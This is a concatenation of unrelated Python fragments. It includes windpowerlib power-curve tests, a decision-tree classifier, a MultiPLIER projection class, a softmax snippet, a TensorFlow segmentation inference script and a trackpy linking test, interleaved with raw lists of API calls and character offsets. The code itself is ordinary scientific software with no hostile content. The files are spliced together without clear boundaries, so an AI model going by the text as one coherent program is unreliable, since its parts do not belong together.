2314059.4022704284, 2590216.6802602503], name='value')
smoothed_curve_exp = pd.DataFrame(data=pd.concat([
wind_speed_values_exp, power_values_exp], axis=1))
smoothed_curve_exp.index = np.arange(5, 10, 1)
assert_frame_equal(smooth_power_curve(**parameters)[5:10],
smoothed_curve_exp)
# Test Staffel_Pfenninger method
parameters['standard_deviation_method'] = 'Staffell_Pfenninger'
power_values_exp = pd.Series([
929405.1348918702, 1395532.5468724659, 1904826.6851982325,
2402659.118305521, 2844527.1732449625], name='value')
smoothed_curve_exp = pd.DataFrame(
data=pd.concat([wind_speed_values_exp, power_values_exp], axis=1))
smoothed_curve_exp.index = np.arange(5, 10, 1)
assert_frame_equal(smooth_power_curve(**parameters)[5:10],
smoothed_curve_exp)
# Raise ValueError - misspelling
with pytest.raises(ValueError):
parameters['standard_deviation_method'] = 'misspelled'
smooth_power_curve(**parameters)
def test_wake_losses_to_power_curve(self):
test_curve = wt.WindTurbine(**self.test_turbine).power_curve
parameters = {'power_curve_wind_speeds': test_curve['wind_speed'],
'power_curve_values': test_curve['value'],
'wind_farm_efficiency': 0.9}
# Test constant efficiency
power_curve_exp = test_curve.copy(deep=True)
power_curve_exp['value'] = power_curve_exp['value'].values * 0.9
assert_frame_equal(wake_losses_to_power_curve(**parameters),
power_curve_exp)
# Test efficiency curve
parameters['wind_farm_efficiency'] = pd.DataFrame(
pd.concat([pd.Series(np.arange(1, 26, 1)),
pd.Series([
1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85,
0.86, 0.87, 0.89, 0.92, 0.95, 0.95, 0.96, 0.99,
0.95, 0.98, 0.97, 0.99, 1.0, 1.0, 1.0, 1.0])],
axis=1))
parameters['wind_farm_efficiency'].columns = ['wind_speed',
'efficiency']
power_curve_exp = test_curve.copy(deep=True)
power_curve_exp['value'] = (
power_curve_exp['value'].values * parameters[
'wind_farm_efficiency']['efficiency'])
assert_frame_equal(wake_losses_to_power_curve(**parameters),
power_curve_exp)
# Raise TypeError if wind farm efficiency is of wrong type
with pytest.raises(TypeError):
parameters['wind_farm_efficiency'] = 1
wake_losses_to_power_curve(**parameters)
if __name__ == "__main__":
test = TestPowerCurves()
test.setup_class()
test.test_smooth_power_curve()
test.test_wake_losses_to_power_curve()
|
[
"windpowerlib.power_curves.smooth_power_curve",
"windpowerlib.wind_turbine.WindTurbine",
"windpowerlib.power_curves.wake_losses_to_power_curve",
"pytest.raises",
"numpy.arange",
"pandas.Series",
"pandas.concat"
] |
[((1218, 1274), 'pandas.Series', 'pd.Series', (['[6.0, 7.0, 8.0, 9.0, 10.0]'], {'name': '"""wind_speed"""'}), "([6.0, 7.0, 8.0, 9.0, 10.0], name='wind_speed')\n", (1227, 1274), True, 'import pandas as pd\n'), ((1344, 1473), 'pandas.Series', 'pd.Series', (['[1141906.9806766496, 1577536.8085282773, 1975480.993355767, \n 2314059.4022704284, 2590216.6802602503]'], {'name': '"""value"""'}), "([1141906.9806766496, 1577536.8085282773, 1975480.993355767, \n 2314059.4022704284, 2590216.6802602503], name='value')\n", (1353, 1473), True, 'import pandas as pd\n'), ((1651, 1670), 'numpy.arange', 'np.arange', (['(5)', '(10)', '(1)'], {}), '(5, 10, 1)\n', (1660, 1670), True, 'import numpy as np\n'), ((1926, 2054), 'pandas.Series', 'pd.Series', (['[929405.1348918702, 1395532.5468724659, 1904826.6851982325, \n 2402659.118305521, 2844527.1732449625]'], {'name': '"""value"""'}), "([929405.1348918702, 1395532.5468724659, 1904826.6851982325, \n 2402659.118305521, 2844527.1732449625], name='value')\n", (1935, 2054), True, 'import pandas as pd\n'), ((2232, 2251), 'numpy.arange', 'np.arange', (['(5)', '(10)', '(1)'], {}), '(5, 10, 1)\n', (2241, 2251), True, 'import numpy as np\n'), ((607, 642), 'windpowerlib.wind_turbine.WindTurbine', 'wt.WindTurbine', ([], {}), '(**self.test_turbine)\n', (621, 642), True, 'import windpowerlib.wind_turbine as wt\n'), ((944, 969), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (957, 969), False, 'import pytest\n'), ((1060, 1092), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (1078, 1092), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2421, 2446), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2434, 2446), False, 'import pytest\n'), ((2527, 2559), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (2545, 2559), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2629, 2664), 'windpowerlib.wind_turbine.WindTurbine', 'wt.WindTurbine', ([], {}), '(**self.test_turbine)\n', (2643, 2664), True, 'import windpowerlib.wind_turbine as wt\n'), ((3057, 3097), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (3083, 3097), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((3949, 3989), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (3975, 3989), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((4116, 4140), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (4129, 4140), False, 'import pytest\n'), ((4205, 4245), 'windpowerlib.power_curves.wake_losses_to_power_curve', 'wake_losses_to_power_curve', ([], {}), '(**parameters)\n', (4231, 4245), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((1541, 1601), 'pandas.concat', 'pd.concat', (['[wind_speed_values_exp, power_values_exp]'], {'axis': '(1)'}), '([wind_speed_values_exp, power_values_exp], axis=1)\n', (1550, 1601), True, 'import pandas as pd\n'), ((1698, 1730), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (1716, 1730), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((2135, 2195), 
'pandas.concat', 'pd.concat', (['[wind_speed_values_exp, power_values_exp]'], {'axis': '(1)'}), '([wind_speed_values_exp, power_values_exp], axis=1)\n', (2144, 2195), True, 'import pandas as pd\n'), ((2279, 2311), 'windpowerlib.power_curves.smooth_power_curve', 'smooth_power_curve', ([], {}), '(**parameters)\n', (2297, 2311), False, 'from windpowerlib.power_curves import smooth_power_curve, wake_losses_to_power_curve\n'), ((3313, 3477), 'pandas.Series', 'pd.Series', (['[1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, 0.89, 0.92,\n 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, \n 0.89, 0.92, 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, \n 1.0, 1.0])\n', (3322, 3477), True, 'import pandas as pd\n'), ((3268, 3287), 'numpy.arange', 'np.arange', (['(1)', '(26)', '(1)'], {}), '(1, 26, 1)\n', (3277, 3287), True, 'import numpy as np\n')]
|
import numpy as np
# Was told built-in libraries are acceptable.
from collections import Counter
class Node:
def __init__(self, left=None, right=None,
best_feature=None, threshold=None, value=None):
self.left = left
self.right = right
self.best_feature = best_feature
self.threshold = threshold
self.value = value
def is_node_leaf(self):
"""Determines if node is a leaf node."""
return self.value is not None
class Classifier:
def __init__(self, max_depth=5):
self.root = None
self.max_depth = max_depth
def fit(self, X, y):
self.root = self._make_split(X, y)
return self
def predict(self, X):
"""Makes prediction by traversing down our decision tree."""
return np.array(([self._make_prediction(feature, self.root)
for feature in X]))
def _make_split(self, X, y, depth=0):
# Set our number of features according to feature input shape.
num_features = X.shape[1]
num_labels = len(np.unique(y)) # How many unique labels?
# Check if base case is met:
# Maximum depth has been reached or only one label
if depth >= self.max_depth or num_labels == 1:
leaf_value = self._most_common(y)
return Node(value=leaf_value) # Create leaf node if so.
# Select the feature indices in random order (a random permutation)
random_features = np.random.choice(num_features,
num_features, replace=False)
# Use greedy search to find our best available split.
best_feature, threshold = self._find_best(X, y, random_features)
# Determine left and right indices.
left_idx, right_idx = self._what_splits(X[:, best_feature], threshold)
# Recursively make splits until base case met; change depth.
left = self._make_split(X[left_idx, :], y[left_idx], depth+1)
right = self._make_split(X[right_idx, :], y[right_idx], depth+1)
return Node(left, right, best_feature, threshold)
def _find_best(self, X, y, feature_indices):
# Define default values for best gain, index, and threshold.
best_gain = -1
split_index = None
split_threshold = None
# Iterate through list of feature indices.
for index in feature_indices:
# Set the selected column
X_column = X[:, index]
thresholds = np.unique(X_column) # Determine unique values.
for threshold in thresholds:
# Iterate through and calculate the information gain.
gain = self._calculate_information_gain(X_column, y, threshold)
# If the current gain beats the best gain so far, record it as the
# new best gain and remember the corresponding split index and threshold.
if gain > best_gain:
best_gain = gain
split_index = index
split_threshold = threshold
return split_index, split_threshold
def _what_splits(self, X, split_threshold):
# Split should be left if X <= our threshold.
left = np.argwhere(X <= split_threshold).flatten()
# Split should be right if X > our threshold.
right = np.argwhere(X > split_threshold).flatten()
return left, right
def _calculate_entropy(self, y):
histo = np.bincount(y) # Counts the occurrences of each label value
ps = histo / len(y)
# List comprehension; calculate entropy.
return -np.sum([p * np.log2(p) for p in ps if p > 0])
def _calculate_information_gain(self, X, y, split_threshold):
# Calculate entropy of the parent
parent_entropy = self._calculate_entropy(y)
# Determine the left and right values.
left, right = self._what_splits(X, split_threshold)
# Confirm there's information gain.
if len(left) == 0 or len(right) == 0:
return 0
# For calculation of weighted average.
num = len(y)
num_left, num_right = len(left), len(right)
# Calculate the entropy for the left side, as well as the right.
entropy_left = self._calculate_entropy(y[left])
entropy_right = self._calculate_entropy(y[right])
# Determine the weighted average of the entropy of our children.
child_entropy = ((num_left/num) * entropy_left +
(num_right/num) * entropy_right)
# Subtract this entropy from our parent to get our information gain.
information_gain = parent_entropy - child_entropy
return information_gain
def _most_common(self, y):
counter = Counter(y)
most_common = counter.most_common(1)[0][0]
return most_common
def _make_prediction(self, X, node):
# Check if the node is a leaf. If it is, return its value.
if node.is_node_leaf():
return node.value
# Otherwise, traverse down the decision tree.
if X[node.best_feature] <= node.threshold:
return self._make_prediction(X, node.left)
else:
return self._make_prediction(X, node.right)
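# Hedged usage sketch (added for illustration; the toy data below is made up):
# the classifier follows the usual fit/predict pattern on numpy arrays.
if __name__ == "__main__":
    X_demo = np.array([[2.0, 1.0], [1.0, 3.0], [8.0, 9.0], [9.0, 8.0]])
    y_demo = np.array([0, 0, 1, 1])
    clf = Classifier(max_depth=3).fit(X_demo, y_demo)
    print(clf.predict(X_demo))  # expected: [0 0 1 1]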
|
[
"numpy.log2",
"numpy.random.choice",
"numpy.argwhere",
"collections.Counter",
"numpy.bincount",
"numpy.unique"
] |
[((1449, 1508), 'numpy.random.choice', 'np.random.choice', (['num_features', 'num_features'], {'replace': '(False)'}), '(num_features, num_features, replace=False)\n', (1465, 1508), True, 'import numpy as np\n'), ((3475, 3489), 'numpy.bincount', 'np.bincount', (['y'], {}), '(y)\n', (3486, 3489), True, 'import numpy as np\n'), ((4761, 4771), 'collections.Counter', 'Counter', (['y'], {}), '(y)\n', (4768, 4771), False, 'from collections import Counter\n'), ((1082, 1094), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (1091, 1094), True, 'import numpy as np\n'), ((2471, 2490), 'numpy.unique', 'np.unique', (['X_column'], {}), '(X_column)\n', (2480, 2490), True, 'import numpy as np\n'), ((3237, 3270), 'numpy.argwhere', 'np.argwhere', (['(X <= split_threshold)'], {}), '(X <= split_threshold)\n', (3248, 3270), True, 'import numpy as np\n'), ((3351, 3383), 'numpy.argwhere', 'np.argwhere', (['(X > split_threshold)'], {}), '(X > split_threshold)\n', (3362, 3383), True, 'import numpy as np\n'), ((3631, 3641), 'numpy.log2', 'np.log2', (['p'], {}), '(p)\n', (3638, 3641), True, 'import numpy as np\n')]
|
"""
Classes and code with MultiPLIER related functionality.
"""
import conf
import numpy as np
import pandas as pd
class MultiplierProjection(object):
"""Projects new data into the MultiPLIER latent space."""
def __init__(self):
pass
def transform(
self,
y: pd.DataFrame,
multiplier_compatible: bool = True,
) -> pd.DataFrame:
"""Projects a gene dataset into the MultiPLIER model.
This code is a reimplementation in Python of the function GetNewDataB
(https://github.com/greenelab/multi-plier/blob/v0.2.0/util/plier_util.R),
more suitable and convenient for the PhenoPLIER project (almost entirely
written in Python).
It basically row-normalizes (z-score) the given dataset, keeps only the
genes in common with the MultiPLIER model, and adds the missing ones as
zeros (mean).
Args:
y:
The new data to be projected. Gene symbols are expected in rows.
The columns could be conditions/samples, but in the PhenoPLIER
context they could also be traits/diseases or perturbations
(Connectivity Map).
multiplier_compatible:
If True, it will try to be fully compatible with the GetNewDataB
function in some situations (for instance, if the new data
contains NaNs).
Returns:
A pandas.DataFrame with the projection of the input data into the
MultiPLIER latent space. The latent variables of the MultiPLIER
model are in rows, and the columns are those of the input data
(conditions, traits, drugs, etc).
"""
z = self._read_model_z()
metadata = self._read_model_metadata()
# nothing special is done if the input data contains NaNs, but it will
# raise a warning for the user.
if y.isna().any().any():
import warnings
warnings.warn("Input data contains NaN values.")
# if multiplier_compatible, just mimic the same behavior of function
# GetNewDataB and return a DataFrame of NaN values.
if multiplier_compatible:
return pd.DataFrame(
data=np.nan,
index=z.columns.copy(),
columns=y.columns.copy(),
)
# if given data has Ensembl ID genes, then convert z genes to that
if y.index[0].startswith("ENSG"):
from entity import Gene
z = z.rename(index=Gene.GENE_NAME_TO_ID_MAP)
# row-standardize the data with z-score
y_std = y.sub(y.mean(1), axis=0).div(y.std(1), axis=0)
model_genes = z.index
data_genes = y_std.index
common_genes = model_genes.intersection(data_genes)
# select from input data only genes in common with model, and add missing ones
# as zeros (mean).
y_std = y_std.loc[common_genes].append(
pd.DataFrame(
0,
index=model_genes.difference(data_genes),
columns=y_std.columns.copy(),
)
)
# get the precision matrix of gene loadings (z matrix)
z_cov_inv = pd.DataFrame(
data=np.linalg.pinv(z.T.dot(z) + metadata["L2"] * np.identity(z.shape[1])),
index=z.columns.copy(),
columns=z.columns.copy(),
)
# perform final matrix multiplication: (z^T z + l2 I)^{-1} z^T Y
return z_cov_inv.dot(z.T).dot(y_std)
@staticmethod
def _read_model_z():
"""Returns the MultiPLIER Z matrix (gene loadings)."""
return pd.read_pickle(conf.MULTIPLIER["MODEL_Z_MATRIX_FILE"])
@staticmethod
def _read_model_metadata():
"""Returns metadata of the MultiPLIER model."""
return pd.read_pickle(conf.MULTIPLIER["MODEL_METADATA_FILE"])
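# Hedged sketch (illustrative only, with hypothetical shapes): the projection
# computed by `transform` boils down to the ridge-regularized solve
# B = (Z^T Z + L2 * I)^{-1} Z^T Y, which in plain numpy reads:
#
#     rng = np.random.default_rng(0)
#     Z = rng.normal(size=(100, 8))    # genes x latent variables (model loadings)
#     Y = rng.normal(size=(100, 3))    # genes x samples, already row z-scored
#     L2 = 10.0
#     B = np.linalg.pinv(Z.T @ Z + L2 * np.identity(Z.shape[1])) @ Z.T @ Y
#     # B has shape (8, 3): latent variables x samples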
|
[
"pandas.read_pickle",
"warnings.warn",
"numpy.identity"
] |
[((3704, 3758), 'pandas.read_pickle', 'pd.read_pickle', (["conf.MULTIPLIER['MODEL_Z_MATRIX_FILE']"], {}), "(conf.MULTIPLIER['MODEL_Z_MATRIX_FILE'])\n", (3718, 3758), True, 'import pandas as pd\n'), ((3881, 3935), 'pandas.read_pickle', 'pd.read_pickle', (["conf.MULTIPLIER['MODEL_METADATA_FILE']"], {}), "(conf.MULTIPLIER['MODEL_METADATA_FILE'])\n", (3895, 3935), True, 'import pandas as pd\n'), ((1998, 2046), 'warnings.warn', 'warnings.warn', (['"""Input data contains NaN values."""'], {}), "('Input data contains NaN values.')\n", (2011, 2046), False, 'import warnings\n'), ((3353, 3376), 'numpy.identity', 'np.identity', (['z.shape[1]'], {}), '(z.shape[1])\n', (3364, 3376), True, 'import numpy as np\n')]
|
import numpy as np
def softmax(a):
return np.exp(a) / np.sum(np.exp(a))
input_a = np.array([-3, -1.5, 0.3, 0.6, 1, 1.8, 3])
print(np.round(softmax(input_a), 3))
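# Hedged variant (added for illustration): subtracting the maximum before
# exponentiating gives the same probabilities but avoids overflow for large inputs.
def softmax_stable(a):
    shifted = a - np.max(a)
    return np.exp(shifted) / np.sum(np.exp(shifted))
# print(np.round(softmax_stable(input_a), 3))  # matches the output above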
|
[
"numpy.array",
"numpy.exp"
] |
[((88, 129), 'numpy.array', 'np.array', (['[-3, -1.5, 0.3, 0.6, 1, 1.8, 3]'], {}), '([-3, -1.5, 0.3, 0.6, 1, 1.8, 3])\n', (96, 129), True, 'import numpy as np\n'), ((47, 56), 'numpy.exp', 'np.exp', (['a'], {}), '(a)\n', (53, 56), True, 'import numpy as np\n'), ((66, 75), 'numpy.exp', 'np.exp', (['a'], {}), '(a)\n', (72, 75), True, 'import numpy as np\n')]
|
import tensorflow as tf
import numpy as np
import scipy.io as scio
import os
import sys
import random
import network
import math
CATEGORY_NAME = ['Backpack', 'Basket', 'Bathtub', 'Bed', 'Bench', 'Bicycle', 'Bowl', 'Chair', 'Cup', 'Desk', 'DryingRack', 'Handcart',
'Hanger', 'Hook', 'Lamp', 'Laptop', 'Shelf', 'Sink', 'Sofa', 'Stand', 'Stool', 'Stroller', 'Table', 'Tvbench', 'Vase']
FUNC_LABEL_NUM = 18
BATCH_SIZE = 1
MODEL = '../../Model/iSEG/full/model.ckpt'
DATA_IO = '../../DATA/label/labelMat'
DATA_SCE = '../../Output/iGEN/full/gen'
TEST_FILE = '../../DATA/cvlist/test_0.txt'
OUTPUT_FILE = '../../Output/iSEG/full'
if not os.path.exists(OUTPUT_FILE+'/'):
os.makedirs(OUTPUT_FILE+'/')
cate_label_idx_list = scio.loadmat('../../DATA/label/interactionLabel.mat')
cate_label_idx_list = np.squeeze(cate_label_idx_list['categoryLabelIdx'])
# add noise
def dataAug(input, weight = 1.0):
dim = input.shape[0]
c = input.shape[-1]
data = np.random.rand(dim,dim,dim,c)
out = data + input * weight
f_s = np.sum(out, axis=-1, keepdims=True)
return out/f_s
print("Loading data...")
dataSce = {}
dataBinary = {}
for model in os.listdir(DATA_SCE):
data = scio.loadmat(DATA_SCE + '/' + model)
data = data['instances']
data = np.reshape(data.data, [64,64,64,3])
dataSce[model] = data
data = np.argmax(data,-1)
binaryData = np.zeros((64,64,64,2))
free = np.zeros((64,64,64))
central = np.zeros((64,64,64))
free[data==2]=1
central[data==0]=1
binaryData[:,:,:,0] = central
binaryData[:,:,:,1] = free
dataBinary[model] = binaryData
testList = []
f = open(TEST_FILE)
lines = f.readlines()
for line in lines:
model_x = line.split('\n')[0]+'_rec_sce_4seg.mat'
temp = np.zeros(25,dtype=np.int32)
label = line.split('_')[0]
label_idx_list = []
label_idx = np.zeros(FUNC_LABEL_NUM+2,dtype=np.int32)
for i in range(25):
if CATEGORY_NAME[i] == label:
temp[i] = 1
label_idx_list = np.squeeze(cate_label_idx_list[i])
break
if label == 'Backpack':
label_idx_list = [1]
for idx in label_idx_list:
label_idx[idx] = 1
label_idx[0] = 1
label_idx[-1] = 1
testList.append([model_x,temp,label_idx])
f.close()
print("dataSce loaded")
# setup network
iSEG = network.iSEG(BATCH_SIZE)
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True)))
tf.global_variables_initializer().run()
model_ckpt = MODEL + '.index'
print(MODEL)
if os.path.isfile(model_ckpt):
print('model.ckpt file found')
else:
print('model file not found, quit.')
exit()
saver = tf.train.Saver()
saver.restore(sess, MODEL)
print('Model restored')
x = np.random.rand(BATCH_SIZE, 64, 64, 64, 3)
x_binary = np.random.rand(BATCH_SIZE, 64, 64, 64, 2)
label = np.random.rand(BATCH_SIZE, 25)
label_idx = np.random.rand(BATCH_SIZE, FUNC_LABEL_NUM + 2)
for i in range(len(testList)):
model_x, label_, label_idx_ = testList[i]
x[0, :, :, :, :] = dataSce[model_x]
x_binary[0, :, :, :, :] = dataBinary[model_x]
label[0] = label_
label_idx[0] = label_idx_
result = sess.run([iSEG.x_rec], feed_dict = {iSEG.x: x, iSEG.x_binary:x_binary, iSEG.label:label})
result = np.reshape(result, [64, 64, 64, FUNC_LABEL_NUM + 2])
# for refine
# if not os.path.exists(OUTPUT_FILE+'/refine/'):
# os.makedirs(OUTPUT_FILE+'/refine/')
# scio.savemat(OUTPUT_FILE+'/refine/'+model_x[0:-4]+'_label_refine.mat', {'instances':result})
# for visual
label_sce = np.argmax(result,-1)+1
label_max = np.amax(label_sce)
label_sce[label_sce==label_max] = 0
if not os.path.exists(OUTPUT_FILE + '/visual/'):
os.makedirs(OUTPUT_FILE + '/visual/')
scio.savemat(OUTPUT_FILE + '/visual/'+model_x[0:-4] + '_label.mat', {'instances':label_sce.astype(np.int8)})
|
[
"numpy.sum",
"os.makedirs",
"tensorflow.train.Saver",
"scipy.io.loadmat",
"numpy.random.rand",
"numpy.argmax",
"network.iSEG",
"tensorflow.global_variables_initializer",
"os.path.exists",
"numpy.zeros",
"numpy.amax",
"os.path.isfile",
"numpy.reshape",
"numpy.squeeze",
"tensorflow.GPUOptions",
"os.listdir"
] |
[((725, 778), 'scipy.io.loadmat', 'scio.loadmat', (['"""../../DATA/label/interactionLabel.mat"""'], {}), "('../../DATA/label/interactionLabel.mat')\n", (737, 778), True, 'import scipy.io as scio\n'), ((801, 852), 'numpy.squeeze', 'np.squeeze', (["cate_label_idx_list['categoryLabelIdx']"], {}), "(cate_label_idx_list['categoryLabelIdx'])\n", (811, 852), True, 'import numpy as np\n'), ((1138, 1158), 'os.listdir', 'os.listdir', (['DATA_SCE'], {}), '(DATA_SCE)\n', (1148, 1158), False, 'import os\n'), ((2186, 2210), 'network.iSEG', 'network.iSEG', (['BATCH_SIZE'], {}), '(BATCH_SIZE)\n', (2198, 2210), False, 'import network\n'), ((2396, 2422), 'os.path.isfile', 'os.path.isfile', (['model_ckpt'], {}), '(model_ckpt)\n', (2410, 2422), False, 'import os\n'), ((2525, 2541), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2539, 2541), True, 'import tensorflow as tf\n'), ((2598, 2639), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(64)', '(64)', '(64)', '(3)'], {}), '(BATCH_SIZE, 64, 64, 64, 3)\n', (2612, 2639), True, 'import numpy as np\n'), ((2651, 2692), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(64)', '(64)', '(64)', '(2)'], {}), '(BATCH_SIZE, 64, 64, 64, 2)\n', (2665, 2692), True, 'import numpy as np\n'), ((2701, 2731), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(25)'], {}), '(BATCH_SIZE, 25)\n', (2715, 2731), True, 'import numpy as np\n'), ((2744, 2790), 'numpy.random.rand', 'np.random.rand', (['BATCH_SIZE', '(FUNC_LABEL_NUM + 2)'], {}), '(BATCH_SIZE, FUNC_LABEL_NUM + 2)\n', (2758, 2790), True, 'import numpy as np\n'), ((639, 672), 'os.path.exists', 'os.path.exists', (["(OUTPUT_FILE + '/')"], {}), "(OUTPUT_FILE + '/')\n", (653, 672), False, 'import os\n'), ((673, 703), 'os.makedirs', 'os.makedirs', (["(OUTPUT_FILE + '/')"], {}), "(OUTPUT_FILE + '/')\n", (684, 703), False, 'import os\n'), ((951, 983), 'numpy.random.rand', 'np.random.rand', (['dim', 'dim', 'dim', 'c'], {}), '(dim, dim, dim, c)\n', (965, 983), True, 'import numpy as np\n'), ((1018, 1053), 'numpy.sum', 'np.sum', (['out'], {'axis': '(-1)', 'keepdims': '(True)'}), '(out, axis=-1, keepdims=True)\n', (1024, 1053), True, 'import numpy as np\n'), ((1168, 1204), 'scipy.io.loadmat', 'scio.loadmat', (["(DATA_SCE + '/' + model)"], {}), "(DATA_SCE + '/' + model)\n", (1180, 1204), True, 'import scipy.io as scio\n'), ((1239, 1277), 'numpy.reshape', 'np.reshape', (['data.data', '[64, 64, 64, 3]'], {}), '(data.data, [64, 64, 64, 3])\n', (1249, 1277), True, 'import numpy as np\n'), ((1307, 1326), 'numpy.argmax', 'np.argmax', (['data', '(-1)'], {}), '(data, -1)\n', (1316, 1326), True, 'import numpy as np\n'), ((1340, 1365), 'numpy.zeros', 'np.zeros', (['(64, 64, 64, 2)'], {}), '((64, 64, 64, 2))\n', (1348, 1365), True, 'import numpy as np\n'), ((1371, 1393), 'numpy.zeros', 'np.zeros', (['(64, 64, 64)'], {}), '((64, 64, 64))\n', (1379, 1393), True, 'import numpy as np\n'), ((1403, 1425), 'numpy.zeros', 'np.zeros', (['(64, 64, 64)'], {}), '((64, 64, 64))\n', (1411, 1425), True, 'import numpy as np\n'), ((1687, 1715), 'numpy.zeros', 'np.zeros', (['(25)'], {'dtype': 'np.int32'}), '(25, dtype=np.int32)\n', (1695, 1715), True, 'import numpy as np\n'), ((1777, 1821), 'numpy.zeros', 'np.zeros', (['(FUNC_LABEL_NUM + 2)'], {'dtype': 'np.int32'}), '(FUNC_LABEL_NUM + 2, dtype=np.int32)\n', (1785, 1821), True, 'import numpy as np\n'), ((3105, 3157), 'numpy.reshape', 'np.reshape', (['result', '[64, 64, 64, FUNC_LABEL_NUM + 2]'], {}), '(result, [64, 64, 64, FUNC_LABEL_NUM + 2])\n', (3115, 3157), True, 'import numpy 
as np\n'), ((3426, 3444), 'numpy.amax', 'np.amax', (['label_sce'], {}), '(label_sce)\n', (3433, 3444), True, 'import numpy as np\n'), ((2309, 2342), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2340, 2342), True, 'import tensorflow as tf\n'), ((3390, 3411), 'numpy.argmax', 'np.argmax', (['result', '(-1)'], {}), '(result, -1)\n', (3399, 3411), True, 'import numpy as np\n'), ((3490, 3530), 'os.path.exists', 'os.path.exists', (["(OUTPUT_FILE + '/visual/')"], {}), "(OUTPUT_FILE + '/visual/')\n", (3504, 3530), False, 'import os\n'), ((3534, 3571), 'os.makedirs', 'os.makedirs', (["(OUTPUT_FILE + '/visual/')"], {}), "(OUTPUT_FILE + '/visual/')\n", (3545, 3571), False, 'import os\n'), ((1907, 1941), 'numpy.squeeze', 'np.squeeze', (['cate_label_idx_list[i]'], {}), '(cate_label_idx_list[i])\n', (1917, 1941), True, 'import numpy as np\n'), ((2274, 2306), 'tensorflow.GPUOptions', 'tf.GPUOptions', ([], {'allow_growth': '(True)'}), '(allow_growth=True)\n', (2287, 2306), True, 'import tensorflow as tf\n')]
|
# -*- coding: utf-8 -*-
"""
Tests for neural spline flows.
"""
import numpy as np
import pytest
import torch
from glasflow.flows import CouplingNSF
@pytest.mark.parametrize("num_bins", [4, 10])
def test_coupling_nsf_init(num_bins):
"""Test the initialise method"""
CouplingNSF(2, 2, num_bins=num_bins)
@pytest.mark.integration_test
def test_coupling_nsf_forward_inverse():
"""Make sure the flow is invertible"""
x = torch.randn(10, 2)
flow = CouplingNSF(2, 2)
with torch.no_grad():
x_prime, log_prob = flow.forward(x)
x_out, log_prob_inv = flow.inverse(x_prime)
np.testing.assert_array_almost_equal(x, x_out)
np.testing.assert_array_almost_equal(log_prob, -log_prob_inv)
|
[
"torch.randn",
"glasflow.flows.CouplingNSF",
"pytest.mark.parametrize",
"numpy.testing.assert_array_almost_equal",
"torch.no_grad"
] |
[((152, 196), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""num_bins"""', '[4, 10]'], {}), "('num_bins', [4, 10])\n", (175, 196), False, 'import pytest\n'), ((276, 312), 'glasflow.flows.CouplingNSF', 'CouplingNSF', (['(2)', '(2)'], {'num_bins': 'num_bins'}), '(2, 2, num_bins=num_bins)\n', (287, 312), False, 'from glasflow.flows import CouplingNSF\n'), ((437, 455), 'torch.randn', 'torch.randn', (['(10)', '(2)'], {}), '(10, 2)\n', (448, 455), False, 'import torch\n'), ((467, 484), 'glasflow.flows.CouplingNSF', 'CouplingNSF', (['(2)', '(2)'], {}), '(2, 2)\n', (478, 484), False, 'from glasflow.flows import CouplingNSF\n'), ((613, 659), 'numpy.testing.assert_array_almost_equal', 'np.testing.assert_array_almost_equal', (['x', 'x_out'], {}), '(x, x_out)\n', (649, 659), True, 'import numpy as np\n'), ((664, 725), 'numpy.testing.assert_array_almost_equal', 'np.testing.assert_array_almost_equal', (['log_prob', '(-log_prob_inv)'], {}), '(log_prob, -log_prob_inv)\n', (700, 725), True, 'import numpy as np\n'), ((495, 510), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (508, 510), False, 'import torch\n')]
|
import numpy as np
import pandas as pd
import pytest
from locan import LocData
from locan.dependencies import HAS_DEPENDENCY
if HAS_DEPENDENCY["trackpy"]:
from trackpy import quiet as tp_quiet
from locan.data.tracking import link_locdata, track
pytestmark = pytest.mark.skipif(
not HAS_DEPENDENCY["trackpy"], reason="requires trackpy"
)
if HAS_DEPENDENCY["trackpy"]:
tp_quiet() # same as: trackpy.logger.setLevel(logging.WARN)
@pytest.fixture()
def locdata_simple():
dict_ = {
"position_x": [0, 1, 2, 10, 20, 21, 30, 4],
"position_y": [0, 1, 2, 10, 20, 21, 30, 4],
"position_z": [0, 1, 2, 10, 20, 21, 30, 4],
"frame": np.arange(8),
}
return LocData(dataframe=pd.DataFrame.from_dict(dict_))
def test_link_locdata(locdata_simple):
track_series = link_locdata(locdata_simple, search_range=5, memory=0)
assert len(track_series) == 8
assert track_series.name == "track"
